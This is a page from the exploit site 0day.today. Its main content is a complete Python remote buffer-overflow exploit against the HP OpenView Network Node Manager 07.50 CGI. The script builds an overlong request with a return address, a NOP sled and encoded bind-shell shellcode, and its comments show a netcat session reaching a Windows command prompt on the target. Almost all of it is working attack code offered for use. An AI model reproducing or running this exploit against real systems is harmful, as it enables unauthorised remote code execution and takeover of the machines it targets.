0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit
[=============================================================
HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit
=============================================================
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# Notes:
# Vanilla stack based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."
# 0day.today [2024-12-23] #